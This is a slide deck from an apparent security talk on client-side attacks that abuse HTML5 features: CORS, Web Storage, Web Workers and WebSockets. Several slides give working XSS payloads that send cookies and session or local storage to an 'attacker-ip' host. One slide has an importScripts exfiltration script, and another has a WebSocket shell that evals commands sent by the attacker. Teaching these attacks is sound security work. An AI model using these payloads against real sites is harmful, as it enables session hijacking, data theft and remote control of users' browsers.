SlideShare a Scribd company logo
Building Client-Side Attacks with
       <HTML5> features




            Tiago Ferreira
           tiago.ccna@gmail.com
AGENDA
ABOUT ME


•   Almost 4 years working with IT network devices and 5
    years with security (MSS, Pentest, VA, etc).

•   Focus on Web Application vulnerabilities exploitation.

•   Security analyst at CONVISO Application Security.

•   Member of the research group Alligator Security Team.
A few words about Same Origin Policy
•   Perhaps the most important security concept within modern browsers.

•   The policy permits scripts running on pages originating from the same
    site to access each other‘s.

•   Prevents access to most methods and properties across pages on
    different sites.

•   An origin is defined by the protocol, host/domain, and port of a URL:

     o   http://www.example.com/dir/page.html
     o   https://www.example.com/dir/page2.html
     o   http://www.example.com:8080/dir/page.html
     o   http://en.example.com/dir/other.html

•   In practice, there is no single same-origin policy:

     o   DOM access, XMLHttpRequest, Cookies, Flash, Java. Silverlight,
         etc
HTML5 Overview
•   The Hypertext Markup Language version 5 (HTML5) is the
    successor of HTML 4.01, XHTML 1.0 and XHTML 1.1.

•   It brings several new technologies to the browser which have
    never been, such as:

     o   New DOM interfaces
     o   New forms elements
     o   Enhanced XHR (Level 2)
     o   Web Storage
     o   Web Socket
     o   Web Workers
     o   File API
     o   Many new attributes

•   HTML5 provides new features to web applications but also
    introduces new security issues.
CORS - (Cross-Origin
  Resource Sharing)
CORS

•   CORS is a web browser technology that enables client-side API
    to make cross-origin requests to external resources.

•   New HTTP header is defined "Access-Control-Allow-Origin" .

        HTTP/1.1 200 OK
        Server: Apache
        Content-Type: text/html
        Access-Control-Allow-Origin: http://example.com/


•   First the UA makes the request to the foreign domain and then
    checks the access control based on the returned Access-Control-
    Allow-Origin header.

•   The decision whether the API (XMLHttpRequest) is allowed to
    access foreing domains is made in UA.
CORS

•   Potential threats

     o   Information gathering
           - Response time based intranet scanning

     o   Universal Allow
          - Bypass access control

     o   Remote attacking a web server
         - UA can be used to attack another web server

     o   DDoS attacks combined with Web Workers
Web Storage
Web Storage
•   Web Storage gives websites the possibility to store data on the
    user's browser. The information can be accessed later using
    JavaScript.

•   Web storage offers two different storage areas:

     o   Local Storage
     o   Session Storage

•   Web storage provides far greater storage capacity (depends on
    browser between 5MB to 10MB).

•   It is supported by: Internet Explorer 8, Mozilla-based browsers
    (e.g., Firefox 2+, officially from 3.5), Safari 4, Google Chrome 4
    (sessionStorage is from 5), Opera 10.50.
localStorage
•   Data placed in local storage is per domain and persists after the
    browser is closed.

•   To store value on the browser:

     o   localStorage.setItem(key, value);

•   To read value stored on the browser;

     o   localStorage.getItem(key);

•   Security considerations:

     o   Sensitive data can be stolen;
     o   Data can be spoofed;
     o   Persistent attack vectors.
sessionStorage

•   Session storage is per-page-per-window and is limited to the
    lifetime of the window.

•   Store value on the browser:

     o   sessionStorage.setItem('key', 'value');

•   Read value stored on the browser:

     o   sessionStorage.getItem(key);

•   Security considerations:

     o   There’s no ‘path’ atribute;
     o   There’s no ‘httpOnly’ atribute;
     o   Session hijacking (xss, session fixation).
Attack: Session hijacking using XSS


•   Old XSS payload to get cookies

    var a=new Image(); a.src=“http://attacker-ip/cookie=“ + document.cookie;


•   New XSS payload

    var a=new Image(); a.src=“http://attacker-ip/cookie=“+
    sessionStorage.getItem(‘SessionID’);
Attack: Session hijacking using XSS

                                                          DEMO

<script>
for(var i = 0; i < sessionStorage.length; i++){
   var key = sessionStorage.key(i);
   var a = new Image();

   a.src="http://attacker-ip/Storage.html?key=" + key +
        "&value=" + sessionStorage.getItem(key);

}
</script>
Attack: Stealing HTML5 localStorage

                                                          DEMO

<script>
for(var i = 0; i < localStorage.length; i++){
   var key = localStorage.key(i);
   var a = new Image();

   a.src="http://attacker-ip/Storage.html?key=" + key +
        “ &value=" + localStorage.getItem(key);

}
</script>
Web workers
Web workers

•   API for spawning background scripts in web
    application via JavaScript.

     o   Real OS-level threads and concurrency.
     o   Managed communication through posting
         messages to background worker.

•   Web Workers run in an isolated thread.

•   Workers do NOT have access to: DOM, window,
    document, and parent objects.

•   Security validation based in same-origin principle.
Spawning a worker

  http://owasp.org/index.html


<script>
var worker = new Worker("worker.js");
a
worker.onmessage = function(event){     http://owasp.org/worker.js
document.getElementById('response„).t    self.onmessage = function(event){
extContet = event.data                     self.postMessage('Hello World');

};                                       };
worker.postMessage();
</script>
…
<pre id=“response” value=“ “>
Workers – Available features
•   The location object (read-only).

•   The navigator object

•   setTimeout()/clearTimeout() and setInterval()/clearInterval().

•   Spawning other web workers.

•   postMessage()
     o send data to worker (strings, JSON object, etc).


•   Event support (addEventListener, dispatchEvent, removeEventLlistener).

•   importScripts
     o importScript(‘http://external.com/script.js’).


•   XMLHttpRequests.
Sending data to worker

 http://owasp.org/index.html
<script>
var worker = new
Worker("worker.js");

                                    http://owasp.org/worker.js
worker.onmessage =
function(event){
                                   self.onmessage = function(event){
                                     self.postMessage(event);
document.getElementById('respo
nse„).textContet = event.data;
                                   };
};

worker.postMessage(„Hello
OWASP Floripa`);
</script>
Attack: Bypass SOP with importScripts()

  •   Workers makes a natural sandbox for running untrusted code.

  •   Workers can’t access page content.

  •   ImportScripts() permits run thirdy party code in your domain.
http://owasp.org/teste.js

var sandbox=new Worker(„sandbox.js‟)
sandbox.postMessage(„http://external.sit   http://owasp.org/sandbox.js
e/badguy.js‟);

                                           onmessage=function(e){
                                                  importScripts(e.data);
                                                  postMessage(this[„someUnt
                                                  rustedFunction‟]());
                                           }
Attack: Bypass SOP with importScripts()

•   But workers can run XMLHttpRequests
                                                                                  DEMO
     o     Script is running in the domain of the parent page.
           (http:/owasp.org/teste.js).

     o     Can read any content on your domain.

         http://external.site/badguy.js

         var xhr = new XMLHttpRequest();
         xhr.open('GET', 'http://owasp.org/index.html', true);
         xhr.send();
         xhr.onreadystatechange = function(remote_data){
              if (remote_data.target.readyState == 4){
                    var remote_data = remote_data.target.responseText;
                    importScripts('http://external.site/remote-page-content=' +
         remote_data);
              };
         };
Attack: DDoS with CORS and Web Workers

•   Start a WebWorker that would fire multiple Cross Origin
    Requests at the target.

•   Thanks CORS that can send GET/POST requests to
    any website.

•   Sending a cross domain GET request is nothing new
    (IMG tag or SCRIPT).

•   So simply by getting someone to visit a URL you can
    get them to send 10,000 HTTP requests/minute.

•   Can be spread with social engineering techniques
    (malicious URL, XSS vulnerabilities).
Attack: DDoS with CORS and Web Workers

                                          Target Web Site
XSS victims




                                        Vulnerable XSS web site




DEMO
                          Attacker injects XSS payload
Web Sockets
Web Sockets
•   Web Sockets is a web technology that provides bi-directional,
    full-duplex communications channels over a single TCP
    connection.

•   The connection is established by upgrading from the HTTP to the
    Web Socket protocol.

•   Web servers are now able to send content to the browser without
    being solicited by the client, wich allows messages to be passed
    back and forth while keeping the connection open.

•   URI Scheme: ws:// and wss://

•   Threats that can be exploited:

     o   Remote Shell, Web-Based Botnet, Port scanning
Web Sockets
Web Sockets – XSS Shell

                                                           DEMO
<script>

var connection = new WebSocket('ws://attacker-ip:port');
   connection.onopen = function (){
      connection.send(„null‟);
    };

connection.onmessage = function(event){
   eval(event.data);
};

</script>
References

•   The Websocket Protocol (http://tools.ietf.org/html/rfc6455)

•   Web Workers (http://www.w3.org/TR/workers/)

•   Web Storage (http://www.w3.org/TR/webstorage/)

•   Attack & Defense Labs (http://blog.andlabs.org/)

•   HTML5 Rocks (http://www.html5rocks.com/).

•   HTML5 Web Security - Michael Schmidt

•   The World According to KOTO (http://blog.kotowicz.net/)

•   Shreeraj's security blog (http://shreeraj.blogspot.in/)
Questions ?

More Related Content

What's hot

Post XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesPost XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and Remedies
Adwiteeya Agrawal
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
Apache Cookbook - TekX Chicago 2010
Apache Cookbook - TekX Chicago 2010Apache Cookbook - TekX Chicago 2010
Apache Cookbook - TekX Chicago 2010
Rich Bowen
 
Fun with exploits old and new
Fun with exploits old and newFun with exploits old and new
Fun with exploits old and new
Larry Cashdollar
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
nyccamp
 
Hack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsHack proof your ASP NET Applications
Hack proof your ASP NET Applications
Sarvesh Kushwaha
 
Hacking Wordpress Plugins
Hacking Wordpress PluginsHacking Wordpress Plugins
Hacking Wordpress Plugins
Larry Cashdollar
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Tornado - different Web programming
Tornado - different Web programmingTornado - different Web programming
Tornado - different Web programming
Dima Malenko
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018
Marius Vorster
 
Node.js: The What, The How and The When
Node.js: The What, The How and The WhenNode.js: The What, The How and The When
Node.js: The What, The How and The When
FITC
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
CODE BLUE
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
Ivan Novikov
 
Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011
Rich Bowen
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?
snyff
 
Mining Ruby Gem vulnerabilities for Fun and No Profit.
Mining Ruby Gem vulnerabilities for Fun and No Profit.Mining Ruby Gem vulnerabilities for Fun and No Profit.
Mining Ruby Gem vulnerabilities for Fun and No Profit.
Larry Cashdollar
 

What's hot (20)

Post XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesPost XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and Remedies
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Apache Cookbook - TekX Chicago 2010
Apache Cookbook - TekX Chicago 2010Apache Cookbook - TekX Chicago 2010
Apache Cookbook - TekX Chicago 2010
 
Fun with exploits old and new
Fun with exploits old and newFun with exploits old and new
Fun with exploits old and new
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
 
Hack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsHack proof your ASP NET Applications
Hack proof your ASP NET Applications
 
Hacking Wordpress Plugins
Hacking Wordpress PluginsHacking Wordpress Plugins
Hacking Wordpress Plugins
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
Tornado - different Web programming
Tornado - different Web programmingTornado - different Web programming
Tornado - different Web programming
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018
 
Node.js: The What, The How and The When
Node.js: The What, The How and The WhenNode.js: The What, The How and The When
Node.js: The What, The How and The When
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
 
Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?
 
Mining Ruby Gem vulnerabilities for Fun and No Profit.
Mining Ruby Gem vulnerabilities for Fun and No Profit.Mining Ruby Gem vulnerabilities for Fun and No Profit.
Mining Ruby Gem vulnerabilities for Fun and No Profit.
 

Viewers also liked

DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
Shah Sheikh
 
Clientside attack using HoneyClient Technology
Clientside attack using HoneyClient TechnologyClientside attack using HoneyClient Technology
Clientside attack using HoneyClient Technology
Julia Yu-Chin Cheng
 
The Beginning Of World War Ii
The Beginning Of World War IiThe Beginning Of World War Ii
The Beginning Of World War Ii
kathomas
 
Cyber Security Visualization
Cyber Security VisualizationCyber Security Visualization
Cyber Security Visualization
Doug Cogswell
 
Honeywall roo 2
Honeywall roo 2Honeywall roo 2
Honeywall roo 2
Julia Yu-Chin Cheng
 
Comparative Study of Mod Security (Autosaved)
Comparative Study of Mod Security (Autosaved)Comparative Study of Mod Security (Autosaved)
Comparative Study of Mod Security (Autosaved)
Dashti Abdullah
 
The real and another
The real and anotherThe real and another
The real and another
Ishika Biswas
 
Staged Patching Approach in Oracle E-Business Suite
Staged Patching Approach in Oracle E-Business SuiteStaged Patching Approach in Oracle E-Business Suite
Staged Patching Approach in Oracle E-Business Suite
vasuballa
 
Ldap injection
Ldap injectionLdap injection
Ldap injection
Sujay Gankidi
 
Detecting Evasive Malware in Sandbox
Detecting Evasive Malware in SandboxDetecting Evasive Malware in Sandbox
Detecting Evasive Malware in Sandbox
Rahul Mohandas
 
Let Your Mach-O Fly, Black Hat DC 2009
Let Your Mach-O Fly, Black Hat DC 2009Let Your Mach-O Fly, Black Hat DC 2009
Let Your Mach-O Fly, Black Hat DC 2009
Vincenzo Iozzo
 
3 Enablers of Successful Cyber Attacks and How to Thwart Them
3 Enablers of Successful Cyber Attacks and How to Thwart Them3 Enablers of Successful Cyber Attacks and How to Thwart Them
3 Enablers of Successful Cyber Attacks and How to Thwart Them
IBM Security
 
How to Audit Firewall, what are the standard Practices for Firewall Audit
How to Audit Firewall, what are the standard Practices for Firewall AuditHow to Audit Firewall, what are the standard Practices for Firewall Audit
How to Audit Firewall, what are the standard Practices for Firewall Audit
keyuradmin
 
Client Side Honeypots
Client Side HoneypotsClient Side Honeypots
Client Side Honeypots
amiable_indian
 
Veil Evasion and Client Side Attacks
Veil Evasion and Client Side AttacksVeil Evasion and Client Side Attacks
Veil Evasion and Client Side Attacks
n|u - The Open Security Community
 
Next Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and DefenseNext Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and Defense
Luca Simonelli
 
Firewall Penetration Testing
Firewall Penetration TestingFirewall Penetration Testing
Firewall Penetration Testing
Chirag Jain
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
Julia Yu-Chin Cheng
 
The Veil-Framework
The Veil-FrameworkThe Veil-Framework
The Veil-Framework
VeilFramework
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil Framework
VeilFramework
 

Viewers also liked (20)

DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
 
Clientside attack using HoneyClient Technology
Clientside attack using HoneyClient TechnologyClientside attack using HoneyClient Technology
Clientside attack using HoneyClient Technology
 
The Beginning Of World War Ii
The Beginning Of World War IiThe Beginning Of World War Ii
The Beginning Of World War Ii
 
Cyber Security Visualization
Cyber Security VisualizationCyber Security Visualization
Cyber Security Visualization
 
Honeywall roo 2
Honeywall roo 2Honeywall roo 2
Honeywall roo 2
 
Comparative Study of Mod Security (Autosaved)
Comparative Study of Mod Security (Autosaved)Comparative Study of Mod Security (Autosaved)
Comparative Study of Mod Security (Autosaved)
 
The real and another
The real and anotherThe real and another
The real and another
 
Staged Patching Approach in Oracle E-Business Suite
Staged Patching Approach in Oracle E-Business SuiteStaged Patching Approach in Oracle E-Business Suite
Staged Patching Approach in Oracle E-Business Suite
 
Ldap injection
Ldap injectionLdap injection
Ldap injection
 
Detecting Evasive Malware in Sandbox
Detecting Evasive Malware in SandboxDetecting Evasive Malware in Sandbox
Detecting Evasive Malware in Sandbox
 
Let Your Mach-O Fly, Black Hat DC 2009
Let Your Mach-O Fly, Black Hat DC 2009Let Your Mach-O Fly, Black Hat DC 2009
Let Your Mach-O Fly, Black Hat DC 2009
 
3 Enablers of Successful Cyber Attacks and How to Thwart Them
3 Enablers of Successful Cyber Attacks and How to Thwart Them3 Enablers of Successful Cyber Attacks and How to Thwart Them
3 Enablers of Successful Cyber Attacks and How to Thwart Them
 
How to Audit Firewall, what are the standard Practices for Firewall Audit
How to Audit Firewall, what are the standard Practices for Firewall AuditHow to Audit Firewall, what are the standard Practices for Firewall Audit
How to Audit Firewall, what are the standard Practices for Firewall Audit
 
Client Side Honeypots
Client Side HoneypotsClient Side Honeypots
Client Side Honeypots
 
Veil Evasion and Client Side Attacks
Veil Evasion and Client Side AttacksVeil Evasion and Client Side Attacks
Veil Evasion and Client Side Attacks
 
Next Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and DefenseNext Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and Defense
 
Firewall Penetration Testing
Firewall Penetration TestingFirewall Penetration Testing
Firewall Penetration Testing
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
The Veil-Framework
The Veil-FrameworkThe Veil-Framework
The Veil-Framework
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil Framework
 

Similar to Building Client-Side Attacks with HTML5 Features

Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
Krzysztof Kotowicz
 
Attacking HTML5
Attacking HTML5Attacking HTML5
Attacking HTML5
AppSec_Labs
 
Html5 security
Html5 securityHtml5 security
Html5 security
Krishna T
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Divyanshu
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
chuckbt
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Ivo Andreev
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Cyber Security Alliance
 
Sanjeev ghai 12
Sanjeev ghai 12Sanjeev ghai 12
Sanjeev ghai 12
Praveen kumar
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.js
orkaplan
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
HTML5 vs Silverlight
HTML5 vs SilverlightHTML5 vs Silverlight
HTML5 vs Silverlight
Matt Casto
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
Krishna T
 
Jinx - Malware 2.0
Jinx - Malware 2.0Jinx - Malware 2.0
Jinx - Malware 2.0
Itzik Kotler
 
Nodejs a-practical-introduction-oredev
Nodejs a-practical-introduction-oredevNodejs a-practical-introduction-oredev
Nodejs a-practical-introduction-oredev
Felix Geisendörfer
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
OWASP Khartoum
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
Nathan Van Gheem
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
Roel Palmaers
 
Browser security
Browser securityBrowser security
Browser security
Uday Anand
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
robertjd
 
Denis Baranov - Root via XSS
Denis Baranov - Root via XSSDenis Baranov - Root via XSS
Denis Baranov - Root via XSS
DefconRussia
 

Similar to Building Client-Side Attacks with HTML5 Features (20)

Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
Attacking HTML5
Attacking HTML5Attacking HTML5
Attacking HTML5
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Sanjeev ghai 12
Sanjeev ghai 12Sanjeev ghai 12
Sanjeev ghai 12
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.js
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
HTML5 vs Silverlight
HTML5 vs SilverlightHTML5 vs Silverlight
HTML5 vs Silverlight
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
Jinx - Malware 2.0
Jinx - Malware 2.0Jinx - Malware 2.0
Jinx - Malware 2.0
 
Nodejs a-practical-introduction-oredev
Nodejs a-practical-introduction-oredevNodejs a-practical-introduction-oredev
Nodejs a-practical-introduction-oredev
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
 
Browser security
Browser securityBrowser security
Browser security
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
 
Denis Baranov - Root via XSS
Denis Baranov - Root via XSSDenis Baranov - Root via XSS
Denis Baranov - Root via XSS
 

More from Conviso Application Security

Entendendo o PCI-DSS
Entendendo o PCI-DSSEntendendo o PCI-DSS
Entendendo o PCI-DSS
Conviso Application Security
 
Integrando testes de segurança ao processo de desenvolvimento de software
Integrando testes de segurança ao processo de desenvolvimento de softwareIntegrando testes de segurança ao processo de desenvolvimento de software
Integrando testes de segurança ao processo de desenvolvimento de software
Conviso Application Security
 
Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações?
Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações? Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações?
Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações?
Conviso Application Security
 
“Web Spiders” – Automação para Web Hacking
“Web Spiders” – Automação para Web Hacking“Web Spiders” – Automação para Web Hacking
“Web Spiders” – Automação para Web Hacking
Conviso Application Security
 
Você Escreve Código e Quem Valida?
Você Escreve Código e Quem Valida?Você Escreve Código e Quem Valida?
Você Escreve Código e Quem Valida?
Conviso Application Security
 
Testar não é suficiente. Tem que fazer direito!
Testar não é suficiente. Tem que fazer direito!Testar não é suficiente. Tem que fazer direito!
Testar não é suficiente. Tem que fazer direito!
Conviso Application Security
 
Implementando Segurança em desenvolvimento com a verdadeira ISO
Implementando Segurança em desenvolvimento com a verdadeira ISOImplementando Segurança em desenvolvimento com a verdadeira ISO
Implementando Segurança em desenvolvimento com a verdadeira ISO
Conviso Application Security
 
Automatizando a análise passiva de aplicações Web
Automatizando a análise passiva de aplicações WebAutomatizando a análise passiva de aplicações Web
Automatizando a análise passiva de aplicações Web
Conviso Application Security
 
Você confia nas suas aplicações mobile?
Você confia nas suas aplicações mobile?Você confia nas suas aplicações mobile?
Você confia nas suas aplicações mobile?
Conviso Application Security
 
Pentest em Aplicações Móveis
Pentest em Aplicações MóveisPentest em Aplicações Móveis
Pentest em Aplicações Móveis
Conviso Application Security
 
MASP: Um processo racional para garantir o nível de proteção das aplicações w...
MASP: Um processo racional para garantir o nível de proteção das aplicações w...MASP: Um processo racional para garantir o nível de proteção das aplicações w...
MASP: Um processo racional para garantir o nível de proteção das aplicações w...
Conviso Application Security
 
HTML5 Seguro ou Inseguro?
HTML5 Seguro ou Inseguro?HTML5 Seguro ou Inseguro?
HTML5 Seguro ou Inseguro?
Conviso Application Security
 
Threats from economical improvement rss 2010
Threats from economical improvement rss 2010Threats from economical improvement rss 2010
Threats from economical improvement rss 2010
Conviso Application Security
 
O processo de segurança em desenvolvimento, que não é ISO 15.408
O processo de segurança em desenvolvimento, que não é ISO 15.408O processo de segurança em desenvolvimento, que não é ISO 15.408
O processo de segurança em desenvolvimento, que não é ISO 15.408
Conviso Application Security
 
Encontrando falhas em aplicações web baseadas em flash
Encontrando falhas em aplicações web baseadas em flashEncontrando falhas em aplicações web baseadas em flash
Encontrando falhas em aplicações web baseadas em flash
Conviso Application Security
 
Protegendo Aplicações Php com PHPIDS - Php Conference 2009
Protegendo Aplicações Php com PHPIDS - Php Conference 2009Protegendo Aplicações Php com PHPIDS - Php Conference 2009
Protegendo Aplicações Php com PHPIDS - Php Conference 2009
Conviso Application Security
 
Playing Web Fuzzing - H2HC 2009
Playing Web Fuzzing - H2HC 2009Playing Web Fuzzing - H2HC 2009
Playing Web Fuzzing - H2HC 2009
Conviso Application Security
 
OWASP Top 10 e aplicações .Net - Tech-Ed 2007
OWASP Top 10 e aplicações .Net - Tech-Ed 2007OWASP Top 10 e aplicações .Net - Tech-Ed 2007
OWASP Top 10 e aplicações .Net - Tech-Ed 2007
